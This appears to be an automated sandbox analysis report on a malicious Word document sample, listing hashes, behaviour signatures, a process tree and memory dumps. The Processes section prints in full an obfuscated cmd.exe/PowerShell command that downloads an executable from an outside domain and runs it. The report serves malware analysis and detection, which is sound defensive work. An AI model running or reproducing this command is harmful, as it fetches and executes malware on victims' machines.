Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    16/06/2024, 18:42

General

  • Target

    b4a09c8b5705427d4cdab9b0f357cdec_JaffaCakes118.doc

  • Size

    159KB

  • MD5

    b4a09c8b5705427d4cdab9b0f357cdec

  • SHA1

    1f7a7e7e280b35cc31cfc35fc684a16b7d12605a

  • SHA256

    38e790bd07cd5f4fe844f600f44fccadf0842eac6977c1a3f17b3a3c6b792ef5

  • SHA512

    fe6c3bb70123416e37891223b631da5b470af151f618f4e1fc36236d6157c18590feae32d8282e8c1ad73db849299ae21be8cd1da35a65647d1d8357baaa468c

  • SSDEEP

    3072:hDj0/OBeGZssdItB7meqXWPb6GLPM+v05eLX:V02BeGZBILm7GPbLLFv058X

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b4a09c8b5705427d4cdab9b0f357cdec_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2944
      • C:\Windows\SysWOW64\Cmd.exe
        Cmd MJLqQEIjIobi UrcAmDSUXqAUWzQSEjQqjwj kulwidrS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %OhzlJISJiuqLiEA%=InhGHOPj&&set %aTGZHiZPTu%=p&&set %XAcwAvYni%=o^w&&set %TjkDfGrdvBuQBPY%=fOjLbEP&&set %dFBWHYfdHZwAT%=!%aTGZHiZPTu%!&&set %nQjuBDhGASPSaYP%=cDNQhJjIsPd&&set %WFIiJlvJ%=e^r&&set %WuCsmCjLUDQ%=!%XAcwAvYni%!&&set %YKzUwpazY%=s&&set %athDIOTwnvMpaNu%=wlwwiQkDIOohij&&set %CncCQsGCko%=he&&set %HUtLDOwuz%=ll&&!%dFBWHYfdHZwAT%!!%WuCsmCjLUDQ%!!%WFIiJlvJ%!!%YKzUwpazY%!!%CncCQsGCko%!!%HUtLDOwuz%! " .((vARiABLE '*MDR*').nAmE[3,11,2]-joIn'') ( (('x'+'ncnsa'+'d'+'asd'+' ='+' &(voD'+'nv'+'oD'+'+voD'+'evoD+vo'+'Dw-'+'objecv'+'oD'+'+voD'+'tvoD) ra'+'ndo'+'m;xnc'+'YY'+'U = .('+'vo'+'Dn'+'ev'+'oD'+'+vo'+'Dwv'+'o'+'D'+'+voD'+'-ob'+'ject'+'vo'+'D) '+'S'+'y'+'s'+'t'+'e'+'m.Net'+'.Web'+'Client;x'+'ncNSB'+' '+'='+' xnc'+'nsadasd.ne'+'x'+'t(10'+'0'+'0'+'0, 2'+'82'+'133'+');xnc'+'A'+'DCX = voD ht'+'t'+'p:'+'//e'+'ertas'+'id'+'a'+'snqweas.co'+'m/'+'A'+'R'+'N/te'+'st'+'v.php?l='+'un'+'don6.yarn'+'vo'+'D.S'+'p'+'li'+'t('+'v'+'oD'+'@voD'+')'+';x'+'nc'+'SD'+'C = x'+'ncen'+'v:public'+' '+'+ v'+'oD'+'1jPvoD +'+' xn'+'cNSB + (voD'+'.exvoD+'+'vo'+'DevoD);'+'fore'+'ac'+'h(xnca'+'sfc in'+' '+'x'+'n'+'cA'+'DC'+'X){t'+'ry{x'+'nc'+'YYU.zFN'+'Do'+'DoIW'+'nl'+'DoIOadFID'+'o'+'I'+'lezF'+'N('+'xncasfc.'+'z'+'FNToSt'+'rDoIiDo'+'INgzF'+'N'+'(), xncS'+'DC)'+';'+'&(voDIn'+'v'+'ovo'+'D+vo'+'DkvoD+'+'voDe'+'-ItemvoD)(xnc'+'SD'+'C'+');'+'brea'+'k;}ca'+'tch{}}') -CrEPLACe ([char]49+[char]106+[char]80),[char]92-CrEPLACe 'xnc',[char]36 -CrEPLACe([char]118+[char]111+[char]68),[char]39 -rEPLaCE ([char]122+[char]70+[char]78),[char]34-rEPLaCE 'DoI',[char]96) )
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2480
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell " .((vARiABLE '*MDR*').nAmE[3,11,2]-joIn'') ( (('x'+'ncnsa'+'d'+'asd'+' ='+' &(voD'+'nv'+'oD'+'+voD'+'evoD+vo'+'Dw-'+'objecv'+'oD'+'+voD'+'tvoD) ra'+'ndo'+'m;xnc'+'YY'+'U = .('+'vo'+'Dn'+'ev'+'oD'+'+vo'+'Dwv'+'o'+'D'+'+voD'+'-ob'+'ject'+'vo'+'D) '+'S'+'y'+'s'+'t'+'e'+'m.Net'+'.Web'+'Client;x'+'ncNSB'+' '+'='+' xnc'+'nsadasd.ne'+'x'+'t(10'+'0'+'0'+'0, 2'+'82'+'133'+');xnc'+'A'+'DCX = voD ht'+'t'+'p:'+'//e'+'ertas'+'id'+'a'+'snqweas.co'+'m/'+'A'+'R'+'N/te'+'st'+'v.php?l='+'un'+'don6.yarn'+'vo'+'D.S'+'p'+'li'+'t('+'v'+'oD'+'@voD'+')'+';x'+'nc'+'SD'+'C = x'+'ncen'+'v:public'+' '+'+ v'+'oD'+'1jPvoD +'+' xn'+'cNSB + (voD'+'.exvoD+'+'vo'+'DevoD);'+'fore'+'ac'+'h(xnca'+'sfc in'+' '+'x'+'n'+'cA'+'DC'+'X){t'+'ry{x'+'nc'+'YYU.zFN'+'Do'+'DoIW'+'nl'+'DoIOadFID'+'o'+'I'+'lezF'+'N('+'xncasfc.'+'z'+'FNToSt'+'rDoIiDo'+'INgzF'+'N'+'(), xncS'+'DC)'+';'+'&(voDIn'+'v'+'ovo'+'D+vo'+'DkvoD+'+'voDe'+'-ItemvoD)(xnc'+'SD'+'C'+');'+'brea'+'k;}ca'+'tch{}}') -CrEPLACe ([char]49+[char]106+[char]80),[char]92-CrEPLACe 'xnc',[char]36 -CrEPLACe([char]118+[char]111+[char]68),[char]39 -rEPLaCE ([char]122+[char]70+[char]78),[char]34-rEPLaCE 'DoI',[char]96) )
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1252

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            4589551c617ffe4cd3bc6c76b2b36cfc

            SHA1

            13182c6196d60b1696a4ae23fc06bd5ba966b7b0

            SHA256

            1453b4fd1a8f5a0e45de135dd2e4092031321484f172b3e526861d6f6a9b9e5d

            SHA512

            51fb3f163e39db9be268fc9bb6cef0900dba520b9abeeba3f8aed755f9b2217f5f2e9710314d3d1539e0eef7b6d4a6934d399d1588fc3e8105d6f3049b640cb3

          • memory/1848-17-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-0-0x000000002FA01000-0x000000002FA02000-memory.dmp

            Filesize

            4KB

          • memory/1848-10-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-45-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-41-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-35-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-32-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-31-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-30-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-28-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-26-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-23-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-24-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-22-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-21-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-20-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-2-0x000000007101D000-0x0000000071028000-memory.dmp

            Filesize

            44KB

          • memory/1848-19-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-16-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-15-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-13-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-12-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-9-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-8-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-6-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-38-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-29-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-18-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-11-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-7-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-52-0x000000007101D000-0x0000000071028000-memory.dmp

            Filesize

            44KB

          • memory/1848-53-0x0000000000470000-0x0000000000570000-memory.dmp

            Filesize

            1024KB

          • memory/1848-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1848-68-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1848-69-0x000000007101D000-0x0000000071028000-memory.dmp

            Filesize

            44KB